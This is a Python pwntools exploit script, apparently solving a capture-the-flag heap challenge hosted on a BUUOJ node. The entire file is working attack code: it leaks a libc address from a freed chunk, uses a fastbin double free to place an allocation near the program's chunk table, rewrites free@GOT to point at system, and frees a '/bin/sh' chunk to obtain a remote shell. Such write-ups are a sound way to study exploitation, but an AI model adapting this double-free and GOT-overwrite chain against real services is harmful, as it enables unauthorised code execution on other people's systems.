from pwn import *
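# Load the target first so the pwntools context can be derived from it instead
# of hard-coding an architecture. The original `context(arch='i386', ...)`
# contradicted the rest of the script, which unpacks 8-byte pointers with
# u64()/p64() and works with 0x7f... libc addresses, i.e. a 64-bit target.
elf = ELF("./pwn")
context.binary = elf          # arch/bits/endian/os taken from the ELF header
context.log_level = 'debug'   # echo every byte sent/received on the tube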
def malloc(size, contet):
    """Menu option 1: allocate a chunk of ``size`` bytes filled with ``contet``.

    The menu prompt and the size prompt are answered with a newline; the
    content is sent raw (no trailing newline) so the payload is exactly what
    the caller passes. ``contet`` keeps its original (misspelled) name so any
    keyword caller keeps working.
    """
    replies = (("5. exit", b'1'), ("--->", str(size)))
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
    p.sendafter("--->", contet)


def free(id):
    """Menu option 3: release the chunk stored at index ``id``."""
    replies = (("5. exit", b'3'), ("--->", str(id)))
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
def edit(id, size, contet):
    """Menu option 2: rewrite chunk ``id`` with ``size`` bytes taken from ``contet``.

    Index and size are sent as text lines; the content itself is sent raw, so
    binary payloads (e.g. ``p64(...)``) arrive unmodified.
    """
    replies = (("5. exit", b'2'), ("--->", str(id)), ("--->", str(size)))
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
    p.sendafter("--->", contet)
def show(id):
    """Menu option 4: select chunk ``id`` for display.

    Only drives the menu; whatever the program prints in response is left on
    the tube for the caller to read.
    """
    replies = (("5. exit", b'4'), ("--->", str(id)))
    for prompt, answer in replies:
        p.sendlineafter(prompt, answer)
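# p = process('./pwn')
p = remote('node4.buuoj.cn', 26517)
libc = ELF('libc-2.23.so')

# Distance between the pointer the program leaks and the libc load address, as
# observed in one debugging run (both absolute 0x7fef... values come from that
# run). Only their difference is meaningful, so it is computed once here.
LEAK_TO_LIBC_BASE = 0x7fef613c4b78 - 0x7fef61000000

# Five chunks; index 4 holds the string that system() is later called with.
malloc(0x80, b'qwer')      # index 0
malloc(0x80, b'qwer')      # index 1
malloc(0x68, b'qwer')      # index 2
malloc(0x68, b'qwer')      # index 3
malloc(0x68, b'/bin/sh')   # index 4

# Leak: chunk 0 is shown after being freed, and the value printed there sits at
# a fixed offset from the libc base (see LEAK_TO_LIBC_BASE).
free(0)
show(0)
p.recvuntil(":")
leak = u64(p.recv(7)[1:] + b'\0' * 2)   # 6 pointer bytes, zero-extended to 8
libc_base = leak - LEAK_TO_LIBC_BASE
system = libc_base + libc.sym["system"]
free_got = elf.got['free']
# pause()

# Double free of chunk 2 (free 2, 3, 2), then three same-size allocations. The
# first allocation writes 0x6020C0-0x23 into the chunk that is handed out a
# second time, so the allocation after the next two lands at that address
# (presumably inside the binary's writable data near its chunk table — verify).
free(2)
free(3)
free(2)
malloc(0x68, p64(0x0000000006020C0 - 0x23))
malloc(0x68, 'ase')
malloc(0x68, 'ase')
print(hex(libc_base))
print(hex(free_got))
# 0x23-0x10 bytes of padding, then free@GOT: evidently this overlaps the
# program's table so that entry 0 now points at the GOT slot (the next edit()
# on index 0 lands there).
malloc(0x68, b'a' * (0x23 - 0x10) + p64(free_got))
# attach(p)

# Overwrite free@GOT with system. This step only works while the GOT is
# writable, i.e. the binary was not linked with Full RELRO. Freeing chunk 4
# (index 4 holds "/bin/sh") then triggers the call.
edit(0, 10, p64(system))
free(4)   # same bytes as the original raw "option 3, index 4" menu writes
p.interactive()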